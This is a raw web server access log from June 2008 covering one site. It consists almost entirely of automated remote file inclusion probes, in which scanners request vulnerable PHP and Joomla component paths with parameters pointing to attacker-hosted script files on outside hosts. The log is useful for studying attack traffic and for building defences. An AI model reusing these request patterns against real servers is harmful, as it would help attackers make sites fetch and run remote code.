217.115.144.54 - - [25/Jun/2008:12:35:04 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:12:35:04 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:35:15 -0700] "GET /logs/access_080420.log/page.php?s=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:35:21 -0700] "GET /logs/access_080420.log/page.php?s=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:36:08 -0700] "GET /logs/index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:36:13 -0700] "GET /index.php?redir=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.805" "www.dmulk.com"
217.29.123.106 - - [25/Jun/2008:12:36:20 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://toolz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
217.29.123.106 - - [25/Jun/2008:12:36:20 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://toolz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:36:49 -0700] "GET /logs/access_080127.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:36:57 -0700] "GET /logs/order/login.php?svr_rootscript=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:36:57 -0700] "GET /order/login.php?svr_rootscript=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
66.79.162.194 - - [25/Jun/2008:12:37:17 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.162.194 - - [25/Jun/2008:12:37:17 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.79.162.194 - - [25/Jun/2008:12:37:17 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:37:20 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:37:23 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 200 18527 "-" "libwww-perl/5.812" "www.dmulk.com"
82.194.86.237 - - [25/Jun/2008:12:37:24 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.hongikspine.co.kr/bbs/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:37:53 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
74.53.178.146 - - [25/Jun/2008:12:37:53 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/coprald/scan/xxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:37:56 -0700] "GET /logs/access_080215.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:37:57 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:37:57 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.79.162.194 - - [25/Jun/2008:12:38:31 -0700] "GET /logs/access_071230.log//squirrelcart/cart_content.php?cart_isp_root=http://www.sandmanwv.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:39:33 -0700] "GET /logs/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:39:35 -0700] "GET /index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.75.39 - - [25/Jun/2008:12:39:52 -0700] "GET /logs/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [25/Jun/2008:12:39:54 -0700] "GET /index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:12:40:19 -0700] "GET /logs/order/login.php?svr_rootscript=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [25/Jun/2008:12:40:19 -0700] "GET /order/login.php?svr_rootscript=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.54.43.84 - - [25/Jun/2008:12:40:19 -0700] "GET /frame.php?page=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:40:21 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:40:24 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:40:28 -0700] "GET /frame.php?page=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.247.139.189 - - [25/Jun/2008:12:40:28 -0700] "GET /frame.php?page=http://203.113.6.34/adu/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:12:40:35 -0700] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:12:40:35 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.188.172.6 - - [25/Jun/2008:12:40:35 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.249.87.100 - - [25/Jun/2008:12:40:37 -0700] "GET /logs/access_080312.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:40:45 -0700] "GET /logs/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:40:46 -0700] "GET /index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:41:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.145.165 - - [25/Jun/2008:12:41:19 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
88.84.145.165 - - [25/Jun/2008:12:41:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.nipservers.com/modules/Forums/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:41:25 -0700] "GET /logs/access_080330.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:41:26 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:41:33 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:12:41:36 -0700] "GET /logs/order/login.php?svr_rootscript=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [25/Jun/2008:12:41:37 -0700] "GET /order/login.php?svr_rootscript=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:41:51 -0700] "GET /logs/access_071225.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.12.112.5 - - [25/Jun/2008:12:42:23 -0700] "GET /logs/access_080312.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://alaskafamily.net/poll/me.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:42:24 -0700] "GET /logs/access_071225.log/index1.php?l=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:42:26 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:42:26 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:42:29 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:42:41 -0700] "GET /logs/access_080212.log/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:42:43 -0700] "GET /index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 200 18401 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:42:44 -0700] "GET /logs/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:43:17 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:43:18 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:43:25 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [25/Jun/2008:12:43:26 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:43:31 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.87.251.47 - - [25/Jun/2008:12:43:41 -0700] "GET /logs/access_080108.log//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.48 - - [25/Jun/2008:12:43:42 -0700] "GET //include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.47 - - [25/Jun/2008:12:43:42 -0700] "GET /logs//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:43:45 -0700] "GET /logs/access_080330.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:43:45 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:44:32 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:44:33 -0700] "GET /classes/core/language.php?rootdir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [25/Jun/2008:12:44:33 -0700] "GET /logs/classes/core/language.php?rootdir=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.87.251.41 - - [25/Jun/2008:12:44:37 -0700] "GET /logs/access_071229.log//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.48 - - [25/Jun/2008:12:44:48 -0700] "GET /logs//include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.87.251.43 - - [25/Jun/2008:12:44:49 -0700] "GET //include/write.php?dir=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:44:51 -0700] "GET /logs/access_080105.log/index.php?incl=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:45:01 -0700] "GET /logs/access.log//squirrelcart/cart_content.php?cart_isp_root=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:45:01 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:45:01 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.93.48.162 - - [25/Jun/2008:12:45:16 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [25/Jun/2008:12:45:16 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:45:19 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:45:23 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:45:29 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:45:32 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [25/Jun/2008:12:45:40 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs/id.txt?? HTTP/1.1" 200 18585 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:45:57 -0700] "GET /logs/access_080215.log/akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:46:00 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.80.152.210 - - [25/Jun/2008:12:46:03 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:46:04 -0700] "GET /logs/errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:46:04 -0700] "GET /errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.70.204.99 - - [25/Jun/2008:12:46:06 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.147 - - [25/Jun/2008:12:46:07 -0700] "GET /admincp/auth/checklogin.php?cfgProgDir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.89.31.213 - - [25/Jun/2008:12:46:13 -0700] "GET /logs/access_071230.log//squirrelcart/cart_content.php?cart_isp_root=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:46:28 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:12:46:28 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:46:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:46:46 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:12:46:49 -0700] "GET /logs/errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [25/Jun/2008:12:46:49 -0700] "GET /errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:12:47:10 -0700] "GET /errors.php?error=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:47:18 -0700] "GET /logs/access_080331.log//trans/trans.php?trans=fr&page=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:47:19 -0700] "GET //trans/trans.php?trans=fr&page=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:47:19 -0700] "GET /logs//trans/trans.php?trans=fr&page=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:47:19 -0700] "GET /logs/access_080301.log//trans/trans.php?trans=fr&page=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:47:51 -0700] "GET /logs/access_080312.log//?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.18.76 - - [25/Jun/2008:12:47:56 -0700] "GET /logs/access_080312.log//?page=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:12:48:10 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fwt.txdnl.com/6-30/a/l/alpaci/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:12:48:10 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fwt.txdnl.com/6-30/a/l/alpaci/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:12:48:15 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://fwt.txdnl.com/6-30/a/l/alpaci/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.245.192.26 - - [25/Jun/2008:12:48:17 -0700] "GET /logs//index.php?incl=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
24.11.142.67 - - [25/Jun/2008:12:48:17 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/4.0 (compatible; GoogleToolbar 4.0.1602.1060-big; Windows XP 5.1; MSIE 7.0.5730.11)" "www.dmulk.com"
216.245.192.26 - - [25/Jun/2008:12:48:18 -0700] "GET //index.php?incl=http://oasislingerie.ca/components/com_virtuemart/shop_image/blank.txt???? HTTP/1.1" 200 18489 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:12:48:45 -0700] "GET /logs/access.log HTTP/1.0" 200 497256 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:48:51 -0700] "GET /logs/access_080330.log//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:48:51 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [25/Jun/2008:12:48:52 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:48:55 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:48:55 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:48:55 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [25/Jun/2008:12:48:55 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
